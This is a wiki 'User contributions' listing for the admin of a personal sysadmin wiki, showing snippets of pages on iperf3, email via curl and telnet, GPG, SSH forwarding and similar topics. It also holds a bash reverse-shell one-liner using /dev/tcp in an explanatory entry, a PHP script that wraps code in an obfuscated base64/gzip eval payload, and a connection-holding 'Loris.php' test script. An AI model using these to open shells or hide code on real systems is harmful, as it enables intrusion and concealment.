Toggle menu
Toggle personal menu
Not logged in
Your IP address will be publicly visible if you make any edits.

User contributions for Admin

A user with 65 edits. Account created on 4 October 2023.
Search for contributionsExpandCollapse
⧼contribs-top⧽
⧼contribs-date⧽
(newest | oldest) View ( | older 50) (20 | 50 | 100 | 250 | 500)

17 July 2024

18 May 2024

  • 21:1121:11, 18 May 2024 diff hist +96 Using Iperf3 for Speed TestingNo edit summary current
  • 21:0821:08, 18 May 2024 diff hist +1,835 N Using Iperf3 for Speed TestingCreated page with "Just found out about a cool little utility called <code>iperf3</code> for testing upload/download speeds between two hosts. On the server make sure to open the testing port on your firewall. Then run the following iperf3 command to start the server in your terminal. iperf3 -s -p 4000 I'm running it on port 4000. Then from the client machine you can run the following to test upload speeds. iperf3 -c SERVER_IP -p 4000 -t 10 If you stick a <code>-R</code> on there t..."

17 May 2024

30 April 2024

  • 01:0901:09, 30 April 2024 diff hist +176 N Do cmd X times without a forloopCreated page with "Say you're in a weird shell and you don't know how to do a forloop. No worries! You can use seq | xargs to run some command any number of times. seq 5 | xargs -I {} echo fart" current

13 April 2024

  • 10:4110:41, 13 April 2024 diff hist +717 N JaphCreated page with "A perl japh is an obfuscated perl program that prints out the message <code>Just another Perl Hacker</code> or <code>Just another Perl Programmer</code>. Here's my first ever attempt at creating a japh. <pre> #!/usr/bin/env perl # John's first japh! use MIME::Base64;use Compress::Zlib;$s='blue23';$p='japh';@k=split '',crypt($p,$s);%h=('1'=>'CEgt','Y'=>'CNk=','0'=>'UUjM','Q'=>'Ti0C ','w'=>'SEzO','l'=>'Ki0u','2'=>'SC1S','3'=>'yy/J','U'=>undef,'7'=> undef,'x'=>'ylHw','N'..." current

11 April 2024

  • 04:0804:08, 11 April 2024 diff hist +556 N Encode.phpCreated page with "Encodes a file as base64 gzip compressed payload file. <pre> <?php $input_file = 'info.php'; $output_file = 'x.php'; function removePhpTags($content) { $content = preg_replace('/^<\?php\s*/', '', $content); $content = preg_replace('/\s*\?>$/', '', $content); return $content; } $file_content = file_get_contents($input_file); $file_content = removePhpTags($file_content); $encoded = base64_encode(gzcompress($file_content)); $payload = "<?php eval(gzuncompress(base..." current

31 December 2023

  • 03:1403:14, 31 December 2023 diff hist +474 N Virsh list all in jsonCreated page with "The following <code>bash</code> command will list all virsh guests in json. echo "[ $(virsh list --all|grep -Ev 'Id|----'|awk '{print "{ \"id\": \""$1"\", \"name\": \""$2"\", \"state\": \""$3 $4"\"}," }'|head -n -1) {} ]"|jq -r Output example: <pre> [ { "id": "38", "name": "Mac", "state": "running" }, { "id": "39", "name": "Dennis", "state": "running" }, { "id": "40", "name": "Charlie", "state": "running" }, ... </pre>" current

14 December 2023

  • 04:0004:00, 14 December 2023 diff hist +618 N Loris.phpCreated page with "Useful little PHP script for holding a connection open for testing. <pre> <?php // John testing holding a connection open, will clean up. Although I guess if // you're reading this that was a lie, sorry... →‎Debug: ini_set('display_errors','1'); ini_set('display_startup_errors','1'); error_reporting (E_ALL); echo "Randomness Begin..."; function random_string($length) { $str = random_bytes($length); $str = base64_encode($str); $str = str_replace(["+", "/..." current

2 December 2023

19 October 2023

7 October 2023

4 October 2023

  • 13:4413:44, 4 October 2023 diff hist +2,150 N John's Wiki:Privacy policyCreated page with "Thank you for visiting [Your Wiki Website Name] (the "Website"). At [Your Wiki Website Name], we are committed to protecting your privacy and ensuring the security of your personal information. This Privacy Policy outlines our practices concerning the collection, use, and disclosure of your information. Please take a moment to review this policy carefully. Information We Collect Usage Information: We may collect non-personal information about how you use our Website, s..." current
  • 13:1713:17, 4 October 2023 diff hist +92 N John's Wiki:General disclaimerCreated page with "Do <span style="color:red">NOT</span> eat the <span style="color:yellow">yellow</span> snow!" current
  • 13:0713:07, 4 October 2023 diff hist +79 Main PageNo edit summary current
  • 12:3412:34, 4 October 2023 diff hist +1,884 N Using the FTP CLI UtilityCreated page with "To use the FTP command line utility run the command below. ftp example.com <pre> Connected to example.com. 220 ProFTPD Server (example.com FTP server) Name (example.com): YOUR_USERNAME 331 Password required for YOUR_USERNAME Password: 230 User YOUR_USERNAME logged in Remote system type is UNIX. Using binary mode to transfer files. </pre> * Then enable passive mode: <pre> ftp> passive Passive mode on. </pre> * You can list files with <code>ls</code..."
  • 12:2412:24, 4 October 2023 diff hist +40 Using Telnet with SMTPNo edit summary current
  • 12:2312:23, 4 October 2023 diff hist +2,837 N Using Telnet with SMTPCreated page with "== The Old Way == To connect to a server using Telnet you would run the following command. telnet mail.example.com 25 However, you're not going to get very far. Unencrypted Telnet is a no-no for most mail servers and they'll cut you off right there. == Using OpenSSL to Connect Securely == Luckily, you can get around this by using the wonderful <code>openssl</code> tool/library to wrap your telnet session in a warm security blanket weaved from the finest encryption..."
  • 12:1512:15, 4 October 2023 diff hist +2,313 N Using Telnet with IMAPCreated page with "== The Old Way == To connect to a server using just plain old telnet and IMAP you would run the following command. telnet mail.example.com 143 However, you're not going to get very far. Dovecote will not allow an insecure login so you're pretty much dead in the water. == Using OpenSSL to Connect Securely == Luckily, you can get around this by using the wonderful <code>openssl</code> tool/library to wrap your telnet session in a warm security blanket weaved from the..." current
  • 12:0412:04, 4 October 2023 diff hist +697 N Sending an Email with Python3 via smtplibCreated page with "It possible to use the module [https://docs.python.org/3/library/smtplib.html <code>smtplib</code>] to send an Email with python3. <pre> #!/usr/bin/env python3 import smtplib from email.message import EmailMessage to_addr = 'to@example.com' from_addr = 'from@example.com' mail_server = 'mail.example.com' passwd = 'YOUR_MAILBOX_PASSWORD' message = EmailMessage() message["To"] = to_addr message["From"] = from_addr message["Subject"] = 'Sent with Python & Smtpli..." current
  • 11:5411:54, 4 October 2023 diff hist +40 Sending an Email with CurlNo edit summary current
  • 11:5311:53, 4 October 2023 diff hist 0 N Category:Sending an Email with...Created blank page current
  • 11:5311:53, 4 October 2023 diff hist +787 N Sending an Email with Perl via SendmailCreated page with "If your system has a <code>sendmail</code> compatible MTA installed you can use it in conjunction with the Perl script below to send an Email using Perl. <pre> #!/usr/bin/env perl $to = 'to@example.com'; $from = 'from@example.com'; $subject = 'Sent with Perl and Sendmail'; $message = 'This is test email sent using Perl and Sendmail.'; open(MAIL, "|/usr/sbin/sendmail -t"); # Email Header print MAIL "To: $to\n"; print MAIL "From: $from\n"; print MAIL "Subject: $subj..." current
  • 11:4311:43, 4 October 2023 diff hist +382 N Sending an Email with CurlCreated page with "* Curl Command: curl -k smtps://mail.example.com \ --user "username:password" -v \ --login-options AUTH=PLAIN \ --mail-from you@example.com \ --mail-rcpt someone@example.com \ --upload-file /full/path/to/email.txt * Example <code>email.txt</code> To: someone@example.com From: you@example.com Subject: Sent With Curl This Email was sent with curl!"
  • 11:3711:37, 4 October 2023 diff hist +5,594 N SSH Port ForwardingCreated page with "== Intro == It is possible to use SSH to take some port on machine A and redirect traffic to it securely through an encrypted tunnel to some other port on machine B. This is called SSH port forwarding and its a powerful yet niche usecase technique for redirecting ports when they may otherwise be inaccessible. == Example Use Case == Say we have two machines. We'll call them "server" and "client". Say on server, Apache is running on localhost port 80. However, server is..." current
  • 11:2711:27, 4 October 2023 diff hist +750 N IMAP SyncCreated page with "Imapsync is a command used to move mail from one mailbox to another. It literally logs into both mailboxes and uses the IMAP protocol to move mail from one mailbox into another. https://imapsync.lamiral.info/S/images/logo_imapsync.png * A sample <code>imapsync</code> command: imapsync --ssl1 --ssl2 --host1 mailserver1.com \ --user1="mailbox@domain.com" \ --host2 mailserver2.com \ --user2="mailbox@domain.com" --subscribe --fast Note: the above command uses the "\"..." current
  • 11:1911:19, 4 October 2023 diff hist 0 N Category:PythonCreated blank page current
  • 11:1911:19, 4 October 2023 diff hist +11 How to Setup a Python Virtual EnvironmentNo edit summary current
  • 11:1811:18, 4 October 2023 diff hist +4,098 N How to Setup a Python Virtual EnvironmentCreated page with "<h2>What is a Virtual Environment?</h2> Python, just like any programming language, has modules (aka, extensions, imports, includes, libraries, dependencies). These modules are just pre-written pieces of code, like functions and objects, that you can import into your project and use to extend the functionality and ease of use of the base language. Normally on your own computer you'd install modules globally at a system-wide level. The problem with depending on globally..."
  • 11:1311:13, 4 October 2023 diff hist +4,892 N GPG EncryptionCreated page with "= GPG - GNU Privacy Guard = == Overview == GPG is an alternative implementation of the OpenPGP standard. GPG/PGP uses asymmetric encryption to generate a public / private key pair. With asymmetric encryption, any data encrypted by the public key can only be decrypted by the private key and vice versa. The intention is to make your public key known and freely available while keeping your private k..."
  • 11:0911:09, 4 October 2023 diff hist +179 John's Wiki:AboutNo edit summary current
  • 11:0511:05, 4 October 2023 diff hist +877 N John's Wiki:AboutCreated page with "In the 1950s, therefore, the leaders of the Soviet Communist Party became thrilled about the new science of cybernetics, which by its nature seemed to translate into a language permeated with an aura of truth, correctness, objectivity – a language therefore perfectly fitting the socialist utopia. Evgeny Zamyatin had described it well in advance in his novel “We” (1920), which – as its translator Alessandro Niero writes – has been "baptised and renamed several..."
  • 10:4210:42, 4 October 2023 diff hist +11,319 N Encoding vs Encryption vs HashingCreated page with "Its easy to confuse these concepts as they are often used in conjunction with each other and mean similar things. However, each has a distinct technical meaning whose usage is applicable / not applicable in different contexts. Each method discussed below uses an algorithm to convert data from one format to another. However, these algorithms differ in the details of their functionality and their overall use cases. == Encoding == In a general sense, encoding means to tu..." current
  • 10:2910:29, 4 October 2023 diff hist +642 N Debugging OptionsCreated page with "== WordPress Debugging == Edit the site's '''wp-config.php''' file to enable WordPress debugging. define( 'WP_DEBUG', true ); define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); That will prevent errors from being displayed on the site and instead log them to a '''wp-content/debug.log''' file. == PHP Debugging == === Via .user.ini or php.ini === display_errors = on To log errors to a '''php-debug.log''' file use the following syntax instead...." current
  • 09:5809:58, 4 October 2023 diff hist +58 N Change TimezoneCreated page with " ln -s /usr/share/zoneinfo/America/New_York /etc/localtime" current
  • 09:5709:57, 4 October 2023 diff hist +2,655 N Bats - Bash Automated Testing SystemCreated page with "= Bash Automated Testing System = == Overview == Bats is a [https://testanything.org/ TAP-compliant] testing framework for Bash. It provides a simple way to verify that the UNIX programs you write behave as expected. A Bats test file is a Bash script with special syntax for defining test cases. Under the hood, each test case is just a function with a description. <pre>#!/usr/bin/env bats @test "addition using bc" { result="$(echo 2+2 | bc)" [..."
  • 09:5009:50, 4 October 2023 diff hist +2,041 N Bash Reverse Shell ExplanationCreated page with "A typical bash reverse shell payload looks like the following, where 1.1.1.1 is your IP address and 1234 is your netcat listener's port. bash -i >& /dev/tcp/1.1.1.1/1234 0>&1 But what the heck does all that mean? The following is my favorite explaination of how it works. <pre> &> file itself is the same as > file 2>&1, that is open file in write-only mode on file descriptor 1, and duplicate that file descriptor 1 to the file descriptor 2, so that both fd 1 and 2 (s..." current
  • 09:4609:46, 4 October 2023 diff hist +1,732 N Base 64Created page with "== On The Command Line == * To decode messages which are in Base 64 simply copy the content of the message into a text file. For example, lets decode the base 64 listed below. TWFuIGlzIGRpc3Rpbmd1aXNoZWQsIG5vdCBvbmx5IGJ5IGhpcyByZWFzb24sIGJ1dCBieSB0aGlz IHNpbmd1bGFyIHBhc3Npb24gZnJvbSBvdGhlciBhbmltYWxzLCB3aGljaCBpcyBhIGx1c3Qgb2Yg dGhlIG1pbmQsIHRoYXQgYnkgYSBwZXJzZXZlcmFuY2Ugb2YgZGVsaWdodCBpbiB0aGUgY29udGlu dWVkIGFuZCBpbmRlZmF0aWdhYmxlIGdlbmVyYXRpb24gb2Yga25vd2xlZGdlLC..." current
  • 09:3809:38, 4 October 2023 diff hist +99 Main PageNo edit summary
  • 09:3309:33, 4 October 2023 diff hist −7 Main PageNo edit summary
  • 09:3209:32, 4 October 2023 diff hist +28 Main PageNo edit summary
  • 09:2909:29, 4 October 2023 diff hist −727 Main PageReplaced content with "<strong>John's Wiki</strong>" Tag: Replaced
(newest | oldest) View ( | older 50) (20 | 50 | 100 | 250 | 500)